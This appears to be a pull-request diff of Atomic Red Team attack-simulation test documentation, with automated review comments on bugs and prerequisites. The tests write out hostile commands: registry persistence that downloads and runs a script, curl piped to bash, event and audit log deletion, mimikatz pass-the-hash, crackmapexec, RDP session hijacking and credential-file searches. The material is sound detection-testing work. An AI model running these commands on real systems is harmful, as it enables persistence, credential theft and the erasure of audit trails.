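Review bot: the two raw URLs differ in case, `atomics/T1059/echo-art-fish.sh` on the curl line versus `Atomics/T1059/echo-art-fish.sh` on the wget line; raw.githubusercontent.com paths are case-sensitive, so the wget variant fetches a 404 body and pipes that to bash, and the marker file is never written. Align it with the lower-case `atomics` path.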
@@ -27,4 +28,7 @@ bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-
<br/>
-2
@@ -11,8 +11,6 @@ atomic_tests:
supported_platforms:
- macos
- centos
- ubuntu
- linux
executor:
+21 -9
@@ -52,22 +52,26 @@ Run Key Persistence
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.exe|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
```
#### Cleanup Commands:
```
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
```
<br/>
<br/>
@@ -77,22 +81,26 @@ RunOnce Key Persistence
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| thing_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.dll|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
```
#### Cleanup Commands:
```
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f
```
<br/>
<br/>
@@ -102,21 +110,25 @@ RunOnce Key Persistence via PowerShell
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| thing_to_execute | Thing to Run | Path | powershell.exe|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
```
#### Cleanup Commands:
```
Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
```
<br/>
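Review bot: the cleanup `Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force` depends on `$RunOnceKey`, which is only assigned in the attack block; when the execution framework runs cleanup in a separate PowerShell process the variable is undefined, `-Path` is empty and the RunOnce value is left behind. Repeat the key assignment in the cleanup commands so each block is self-contained.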
+6 -2
@@ -17,14 +17,15 @@ Create a New-VM
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| hostname | Host to query to see if Hyper-V feature is installed. | string | test-vm|
| vm_name | Create a new VM. | string | testvm|
| file_location | Location of new VHDX file | string | C:\Temp\test.vhdx|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Get-WindowsFeature -Name Hyper-V -ComputerName #{hostname}
Install-WindowsFeature -Name Hyper-V -ComputerName #{hostname} -IncludeManagementTools
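Review bot: `Get-WindowsFeature` and `Install-WindowsFeature` come from the ServerManager module, which exists only on Windows Server, so on a Windows 10 host the test fails before `New-VM` is reached; this is the kind of prerequisite the new dependencies section is meant to capture, so either declare the module there or state the Server-only scope in the description. The `hostname` input is described as the host to query, but the second line also installs the Hyper-V role on that host, which the description should make explicit.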
@@ -33,4 +34,7 @@ New-VM -Name #{vm_name} -MemoryStartupBytes 1GB -NewVHDPath #{file_location} -Ne
<br/>
+20 -4
@@ -32,7 +32,8 @@ Methods to identify Security Software on an endpoint
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
netsh.exe advfirewall firewall show all profiles
tasklist.exe
@@ -44,6 +45,9 @@ tasklist.exe | findstr /i cylance
<br/>
<br/>
@@ -53,7 +57,8 @@ Methods to identify Security Software on an endpoint
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
get-process | ?{$_.Description -like "*virus*"}
get-process | ?{$_.Description -like "*carbonblack*"}
@@ -63,6 +68,9 @@ get-process | ?{$_.Description -like "*cylance*"}
<br/>
<br/>
@@ -72,7 +80,8 @@ Methods to identify Security Software on an endpoint
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
ps -ef | grep Little\ Snitch | grep -v grep
ps aux | grep CbOsxSensorService
@@ -80,6 +89,9 @@ ps aux | grep CbOsxSensorService
<br/>
<br/>
@@ -89,13 +101,17 @@ Discovery of an installed Sysinternals Sysmon service using driver altitude (eve
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
fltmc.exe | findstr.exe 385201
```
<br/>
<br/>
+12 -4
@@ -21,7 +21,8 @@ Creates and executes a simple bash script.
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh"
@@ -31,6 +32,9 @@ sh /tmp/art.sh
<br/>
<br/>
@@ -40,22 +44,26 @@ Creates and executes a simple batch script.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_to_execute | Command to execute within script. | string | dir|
| script_to_create | Path of script to create. | path | C:\Windows\TEMP\execute.bat|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
C:\Windows\system32\cmd.exe /Q /c echo #{command_to_execute} > #{script_to_create}
C:\Windows\system32\cmd.exe /Q /c #{script_to_create}
```
#### Cleanup Commands:
```
del #{script_to_create}
```
<br/>
+12 -4
@@ -17,19 +17,23 @@ Testing uncommonly used port utilizing PowerShell
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| port | Specify uncommon port number | String | 8081|
| domain | Specify target hostname | String | google.com|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
test-netconnection -ComputerName #{domain} -port #{port}
```
<br/>
<br/>
@@ -39,17 +43,21 @@ Testing uncommonly used port utilizing telnet.
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| port | Specify uncommon port number | String | 8081|
| domain | Specify target hostname | String | google.com|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
telnet #{domain} #{port}
```
<br/>
+21 -5
@@ -39,7 +39,8 @@ Permission Groups Discovery
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
dscacheutil -q group
dscl . -list /Groups
@@ -48,6 +49,9 @@ groups
<br/>
<br/>
@@ -57,7 +61,8 @@ Basic Permission Groups Discovery for Windows
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
net localgroup
net group /domain
@@ -65,6 +70,9 @@ net group /domain
<br/>
<br/>
@@ -74,12 +82,13 @@ Permission Groups Discovery utilizing PowerShell
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user | User to identify what groups a user is a member of | string | administrator|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
get-localgroup
get-ADPrincipalGroupMembership #{user} | select name
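Review bot: `get-ADPrincipalGroupMembership #{user} | select name` needs the ActiveDirectory module (RSAT) and a domain-joined host, while `get-localgroup` only needs PowerShell 5.1; since this PR introduces a dependencies section, this test is a natural first user of it (check for the module and document how to obtain it) so the framework can skip or prepare the test instead of failing on the second line.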
@@ -87,6 +96,9 @@ get-ADPrincipalGroupMembership #{user} | select name
<br/>
<br/>
@@ -96,7 +108,8 @@ Runs 'net group' command including command aliases and loose typing to simulate
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
net group /domai 'Domain Admins'
net groups 'Account Operators' /doma
@@ -106,4 +119,7 @@ net group 'BUILTIN\Backup Operators' /doma
<br/>
+39 -11
@@ -43,18 +43,22 @@ Clear Windows Event Logs
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| log_name | Windows Log Name, ex System | String | System|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
wevtutil cl #{log_name}
```
<br/>
<br/>
@@ -64,13 +68,17 @@ Manages the update sequence number (USN) change journal, which provides a persis
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
fsutil usn deletejournal /D C:
```
<br/>
<br/>
@@ -80,7 +88,8 @@ Delete system and audit logs
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
rm -rf /private/var/log/system.log*
rm -rf /private/var/audit/*
@@ -88,6 +97,9 @@ rm -rf /private/var/audit/*
<br/>
<br/>
@@ -97,18 +109,22 @@ This test overwrites the Linux mail spool of a specified user. This technique wa
**Supported Platforms:** Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of mail spool | String | root|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
echo 0> /var/spool/mail/#{username}
```
<br/>
<br/>
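Review bot: `echo 0> /var/spool/mail/#{username}` is parsed by the shell as `echo` with file descriptor 0 redirected to the spool file (`0>` is an fd redirection), so the file is truncated but the `0` is never written and an empty line goes to stdout instead; if the intent is to overwrite the spool with a `0` as the description says, write `echo 0 > /var/spool/mail/#{username}` with a space.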
@@ -118,18 +134,22 @@ This test overwrites the specified log. This technique was used by threat actor
**Supported Platforms:** Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| log_path | Path of specified log | Path | /var/log/secure|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
echo 0> #{log_path}
```
<br/>
<br/>
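Review bot: `echo 0> #{log_path}` has the fd-redirection problem: the `0` binds to the `>` as a descriptor number, so the log is truncated but nothing is written to it; use `echo 0 > #{log_path}` with a space.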
@@ -139,19 +159,23 @@ Recommended Detection: Monitor for use of the windows event log filepath in Powe
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
$eventLogId = Get-WmiObject -Class Win32_Service -Filter "Name LIKE 'EventLog'" | Select-Object -ExpandProperty ProcessId
Stop-Process -Id $eventLogId -Force
Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx
```
#### Cleanup Commands:
```
Start-Service -Name EventLog
```
<br/>
<br/>
@@ -161,11 +185,15 @@ Clear event logs using built-in PowerShell commands
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
Clear-EventLog -logname Application
```
<br/>
+36 -12
@@ -28,12 +28,13 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | www.google.com|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
@@ -43,6 +44,9 @@ Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
<br/>
<br/>
@@ -53,12 +57,13 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | www.google.com|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
@@ -68,6 +73,9 @@ curl -s -A "*<|>*" -m3 #{domain}
<br/>
<br/>
@@ -78,12 +86,13 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | www.google.com|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
@@ -93,6 +102,9 @@ curl -s -A "*<|>*" -m3 #{domain}
<br/>
<br/>
@@ -103,7 +115,7 @@ The intent of this test is to trigger threshold based detection on the number of
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | example.com|
@@ -111,13 +123,17 @@ The intent of this test is to trigger threshold based detection on the number of
| query_type | DNS query type | string | TXT|
| query_volume | Number of DNS queries to send | integer | 1000|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}
```
<br/>
<br/>
@@ -128,7 +144,7 @@ This behaviour is typical of implants either in an idle state waiting for instru
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | example.com|
@@ -138,7 +154,8 @@ This behaviour is typical of implants either in an idle state waiting for instru
| c2_jitter | Percentage of jitter to add to the C2 interval to create variance in the times between C2 requests | integer | 20|
| runtime | Time in minutes to run the simulation | integer | 30|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
@@ -146,6 +163,9 @@ Set-Location $PathToAtomicsFolder
<br/>
<br/>
@@ -156,14 +176,15 @@ The simulation involves sending DNS queries that gradually increase in length un
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | example.com|
| subdomain | Subdomain prepended to the domain name (should be 63 characters to test maximum length) | string | atomicredteamatomicredteamatomicredteamatomicredteamatomicredte|
| query_type | DNS query type | string | TXT|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
@@ -171,4 +192,7 @@ Set-Location $PathToAtomicsFolder
<br/>
+7 -3
View File
@@ -17,20 +17,24 @@ GUP is an open source signed binary used by Notepad++ for software updates, and
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process_name | Name of the created process | string | calculator.exe|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
$PathToAtomicsFolder\T1073\bin\GUP.exe
```
#### Cleanup Commands:
```
taskkill /F /IM #{process_name}
```
<br/>
+16 -4
View File
@@ -21,13 +21,17 @@ Utilize powershell to download discovery.bat and save to a local file
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat') > pi.log
```
<br/>
<br/>
@@ -37,13 +41,17 @@ Utilize curl to download discovery.sh and execute a basic information gathering
**Supported Platforms:** Linux, macOS
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.sh | bash -s > /tmp/discovery.log
```
<br/>
<br/>
@@ -53,15 +61,19 @@ Use living off the land tools to zip a file and stage it in the Windows temporar
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip
```
#### Cleanup Commands:
```
Remove-Item -Path $env:TEMP\Folder_to_zip.zip
```
<br/>
+22 -6
View File
@@ -20,20 +20,24 @@ Note: must dump hashes first
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username | string | Administrator|
| domain | domain | string | atomic.local|
| ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
```
<br/>
<br/>
@@ -43,23 +47,35 @@ command execute with crackmapexec
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username | string | Administrator|
| domain | domain | string | atomic.local|
| ntlm | command | string | cc36cf7a8514893efccd3324464tkg1a|
| command | command to execute | string | whoami|
| crackmapexec_exe | crackmapexec windows executable | Path | C:\CrackMapExecWin\crackmapexec.exe|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command}
```
#### Commands to Check Prerequisites:
#### Dependencies: Run with `powershell`!
##### Description: CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe})
##### Check Prereq Commands:
```
powershell -c if(Test-Path C:\CrackMapExecWin\crackmapexec.exe) { 0 } else { -1 }
if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 }
```
##### Get Prereq Commands:
```
Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe}
```
<br/>
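Review bot: the `ntlm` input's description in the Inputs table reads `command` (copy-pasted from the row below); the first test's table describes the same input as `ntlm hash`, so fix the description in the source yaml, from which this markdown is generated. The default `cc36cf7a8514893efccd3324464tkg1a` also contains non-hex characters (`t`, `k`, `g`), so it can only be a placeholder; say so in the description so users know it must be replaced.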
+13 -2
View File
@@ -54,12 +54,23 @@ atomic_tests:
description: command to execute
type: string
default: whoami
crackmapexec_exe:
description: crackmapexec windows executable
type: Path
default: C:\CrackMapExecWin\crackmapexec.exe
dependency_executor_name: powershell
dependencies:
- description: |
CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe})
prereq_command: |
if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 }
get_prereq_command: |
Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe}
executor:
name: command_prompt
elevation_required: false
prereq_command: |
powershell -c if(Test-Path C:\CrackMapExecWin\crackmapexec.exe) { 0 } else { -1 }
command: |
crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command}
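Review bot: the new `crackmapexec_exe` input is only consulted by the dependency check, while `command` still invokes bare `crackmapexec`, so the prereq passes or fails on a path the executor never uses (and the bare name depends on PATH). Either invoke `#{crackmapexec_exe}` in the command or drop the input. Separately, this check emits `-1` on failure (`if(Test-Path ...) { 0 } else { -1 }`) whereas the other dependencies added in this PR emit `1`; pick one convention so the framework's prereq handling is uniform. Please also confirm the old executor-level `prereq_command` (`powershell -c if(Test-Path C:\CrackMapExecWin\crackmapexec.exe) ...`) is removed rather than left alongside the new `dependencies` block.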
+21 -6
View File
@@ -21,19 +21,23 @@ RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-r
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
query user
sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
net start sesshijack
```
#### Cleanup Commands:
```
sc.exe delete sesshijack
```
<br/>
<br/>
@@ -43,21 +47,32 @@ Attempt an RDP session via "Connect-RDP" to a system. Default RDPs to (%logonser
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| logonserver | ComputerName argument default %logonserver% | String | $ENV:logonserver.TrimStart("\")|
| username | Username argument default %USERDOMAIN%\%username% | String | $Env:USERDOMAIN\$ENV:USERNAME|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Connect-RDP -ComputerName #{logonserver} -User #{username}
```
#### Commands to Check Prerequisites:
#### Dependencies: Run with `powershell`!
##### Description: Computer must be domain joined
##### Check Prereq Commands:
```
if((Get-WmiObject -Class Win32_ComputerSystem).PartOfDomain) {0} else {1}
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {0} else {1}
```
##### Get Prereq Commands:
```
Write-Host Joining this computer to a domain must be done manually
```
<br/>
+9 -2
View File
@@ -32,10 +32,17 @@ atomic_tests:
description: Username argument default %USERDOMAIN%\%username%
type: String
default: $Env:USERDOMAIN\$ENV:USERNAME
dependencies:
- description: |
Computer must be domain joined
prereq_command: |
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {0} else {1}
get_prereq_command: |
Write-Host Joining this computer to a domain must be done manually
executor:
name: powershell
elevation_required: false
prereq_command: |
if((Get-WmiObject -Class Win32_ComputerSystem).PartOfDomain) {0} else {1}
command: |
Connect-RDP -ComputerName #{logonserver} -User #{username}
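Review bot: the only dependency checked is domain membership, but `command` calls `Connect-RDP`, which is not a built-in cmdlet; if that function is not loaded the test fails with a command-not-found error instead of reporting an unmet prerequisite. Add a second dependency entry, e.g. `prereq_command: if(Get-Command Connect-RDP -ErrorAction SilentlyContinue) {0} else {1}`, with a `get_prereq_command` that says where the function comes from. Replacing `Get-WmiObject` with `Get-CIMInstance` in the check is the right call, since the WMI cmdlets are not available in PowerShell 6 and later.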
+24 -8
View File
@@ -25,7 +25,7 @@ Connecting To Remote Shares
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| share_name | Examples C$, IPC$, Admin$ | String | C$|
@@ -33,13 +33,17 @@ Connecting To Remote Shares
| password | Password | String | P@ssw0rd1|
| computer_name | Target Computer Name | String | Target|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
```
<br/>
<br/>
@@ -49,20 +53,24 @@ Map Admin share utilizing PowerShell
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| share_name | Examples C$, IPC$, Admin$ | String | C$|
| computer_name | Target Computer Name | String | Target|
| map_name | Mapped Drive Letter | String | g|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
```
<br/>
<br/>
@@ -72,19 +80,23 @@ Copies a file to a remote host and executes it using PsExec. Requires the downlo
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_host | Remote computer to receive the copy and execute the file | String | \\localhost|
| command_path | File to copy and execute | Path | C:\Windows\System32\cmd.exe|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
psexec.exe #{remote_host} -c #{command_path}
```
<br/>
<br/>
@@ -95,17 +107,21 @@ This technique is used by post-exploitation frameworks.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Remote computer to receive the copy and execute the file | String | output.txt|
| command_to_execute | Command to execute for output. | String | hostname|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
```
<br/>
+21 -5
View File
@@ -27,13 +27,17 @@ In cloud environments, authenticated user credentials are often stored in local
**Supported Platforms:** macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
python2 laZagne.py all
```
<br/>
<br/>
@@ -43,18 +47,22 @@ Extracting credentials from files
**Supported Platforms:** macOS, Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path to search | String | /|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
grep -ri password #{file_path}
```
<br/>
<br/>
@@ -64,7 +72,8 @@ Extracting Credentials from Files
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
findstr /si pass *.xml | *.doc | *.txt | *.xls
ls -R | select-string -Pattern password
@@ -72,6 +81,9 @@ ls -R | select-string -Pattern password
<br/>
<br/>
@@ -81,7 +93,8 @@ Attempts to access unattend.xml, where credentials are commonly stored, within t
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
type C:\Windows\Panther\unattend.xml > nul 2>&1
type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
@@ -89,4 +102,7 @@ type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
<br/>
+40 -8
View File
@@ -49,7 +49,8 @@ Identify System Info
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
systeminfo
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
@@ -57,6 +58,9 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
<br/>
<br/>
@@ -66,7 +70,8 @@ Identify System Info
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
systemsetup
system_profiler
@@ -75,6 +80,9 @@ ls -al /Applications
<br/>
<br/>
@@ -84,7 +92,8 @@ Identify System Info
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
uname -a >> /tmp/loot.txt
cat /etc/lsb-release >> /tmp/loot.txt
@@ -95,6 +104,9 @@ cat /etc/issue >> /tmp/loot.txt
<br/>
<br/>
@@ -104,7 +116,8 @@ Identify virtual machine hardware. This technique is used by the Pupy RAT and ot
**Supported Platforms:** Linux
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
cat /sys/class/dmi/id/bios_version | grep -i amazon
cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"
@@ -118,6 +131,9 @@ sudo lscpu | grep -i "Xen\|KVM\|Microsoft"
<br/>
<br/>
@@ -127,7 +143,8 @@ Identify virtual machine guest kernel modules. This technique is used by the Pup
**Supported Platforms:** Linux
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
sudo lsmod | grep -i "vboxsf\|vboxguest"
sudo lsmod | grep -i "vmw_baloon\|vmxnet"
@@ -138,6 +155,9 @@ sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
<br/>
<br/>
@@ -147,13 +167,17 @@ Identify system hostname for Windows.
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
hostname
```
<br/>
<br/>
@@ -163,13 +187,17 @@ Identify system hostname for Linux and macOS systems.
**Supported Platforms:** Linux, macOS
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
hostname
```
<br/>
<br/>
@@ -179,11 +207,15 @@ Identify the Windows MachineGUID value for a system.
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
```
<br/>
+20 -4
View File
@@ -29,7 +29,8 @@ Find or discover files on the file system
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
dir /s c:\ >> %temp%\download
dir /s "c:\Documents and Settings" >> %temp%\download
@@ -43,6 +44,9 @@ tree /F >> %temp%\download
<br/>
<br/>
@@ -52,7 +56,8 @@ Find or discover files on the file system
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
ls -recurse
get-childitem -recurse
@@ -61,6 +66,9 @@ gci -recurse
<br/>
<br/>
@@ -76,7 +84,8 @@ https://perishablepress.com/list-files-folders-recursively-terminal/
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
ls -a > allcontents.txt
ls -la /Library/Preferences/ > detailedprefsinfo.txt
@@ -89,6 +98,9 @@ which sh
<br/>
<br/>
@@ -98,7 +110,8 @@ Find or discover files on the file system
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
